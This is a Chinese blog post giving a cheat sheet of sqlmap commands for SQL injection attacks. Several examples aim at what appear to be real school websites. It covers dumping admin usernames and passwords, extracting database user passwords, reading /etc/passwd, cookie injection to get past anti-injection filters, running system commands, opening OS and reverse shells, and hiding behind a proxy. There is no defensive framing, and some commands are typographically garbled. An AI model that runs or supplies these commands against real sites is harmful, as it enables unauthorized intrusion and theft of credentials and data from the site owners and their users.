sqlmap常用指令和参数

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010258605/article/details/43267229

/*
-u类型为指令 --tables为参数
当使用的代码为嵌套型(例如先猜表名 后猜指定字段时) 需要键入上一次用到的指令(如果上一次为参数要转换)
   参数转换为指令 : --tables >> -T
例如 要猜字段时 需要键入指定表段                                                     */

检查注入点
    sqlmap.py -u "http://www.scshlx.com/TeachView.asp?id=21"
列数据库信息
    sqlmap -u  "http://www.scshlx.com/TeachView.asp?id=21" --dbs
指定库名列出所有表 //最大搜索线程为10
    sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables
指定库名表名列出所有字段
    sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33"  -T "双引号下为指定表名admin" --columns
指定库名表名字段名dump出指定字段的内容
    sqlmap -u "http://ooxx.com.tw/star_photo.php?artist_id=11" --dump -T "admin" -C "username,password"
查询表名下所有字段
     sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables --columns
Mysql注入(有多个库 必须找到有管理员的数据库)
    --is-dba            当前用户权限
    --dbs            所有数据库
    --current-db        网站当前数据库
    --users            所有数据库用户
    --current-user        当前数据库用户
    --tables-D"当前数据库名字"  查表名、
    -T"指定的表名"-D"当前数据库名字"--columns 查字段
Cookie注入(遇到防注入)
    sqlmap.py -u "http://www.scshlx.com/TeachView.asp" --cookie"id=21"--level 2   
    列表名等 在上方代码后面加--tables等;  
 eg:sqlmap.py -u "http://www.hexuan.com/shownews.asp" --cookie "id=1749" --level 2 --dump -T "admin" -C "username"
有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档:
    –cookie=COOKIE                                       在需要登录的地方,需要登录后的cookie
    –proxy=”http://127.0.0.1:8087″                  使用HTTP代理隐藏自己的身份,比如使用goagent等
    –sql-query=QUERY                                     执行一个sql语句,不一定支持
sqlmap -u “http://url/news?id=1″ --dbms “Mysql” –users # dbms 指定数 据库类型
sqlmap -u “http://url/news?id=1″ -- users 列数据库用户
sqlmap -u “http://url/news?id=1″ -- dbs   列数据库
sqlmap -u “http://url/news?id=1″ -- passwords 数据库用户密码
sqlmap -u “http://url/news?id=1″ -- passwords-U root -v 0 #列出指定用户 数据库密码
sqlmap  -u  “http://url/news?id=1″   -- dump  -C  “password,user,id”  -T “tablename”-D “db_name”
–start 1 –stop 20 #列出指定字段,列出20 条
sqlmap -u “http://url/news?id=1″ -- dump-all -v 0 #列出所有数据库所有表
sqlmap -u “http://url/news?id=1″ -- privileges #查看权限
sqlmap -u “http://url/news?id=1″ -- privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色
sqlmap -u “http://url/news?id=1″ -- udf-inject #导入用户自定义函数(获取 系统权限!)
sqlmap -u “http://url/news?id=1″ -- dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
sqlmap -u “http://url/news?id=1″ -- union-cols #union 查询表记录
sqlmap -u “http://url/news?id=1″ -- cookie “COOKIE_VALUE”#cookie注入
sqlmap -u “http://url/news?id=1″ -- b #获取banner信息
sqlmap -u “http://url/news?id=1″ -- data “id=3″#post注入
sqlmap -u “http://url/news?id=1″ - v 1 -f #指纹判别数据库类型
sqlmap -u “http://url/news?id=1″ -- proxy“http://127.0.0.1:8118” #代理注 入
sqlmap -u “http://url/news?id=1″ -- string”STRING_ON_TRUE_PAGE”# 指 定关键词
sqlmap -u “http://url/news?id=1″ -- sql-shell #执行指定sql命令
sqlmap -u “http://url/news?id=1″ -- file /etc/passwd
sqlmap -u “http://url/news?id=1″ -- os-cmd=whoami #执行系统命令
sqlmap -u “http://url/news?id=1″ -- os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
sqlmap -u “http://url/news?id=1″ -- reg-read #读取win系统注册表
sqlmap -u “http://url/news?id=1″ -- dbs-o “sqlmap.log”#保存进度
sqlmap -u “http://url/news?id=1″ -- dbs -o “sqlmap.log” –resume #恢复 已保存进度
展开阅读全文

没有更多推荐了,返回首页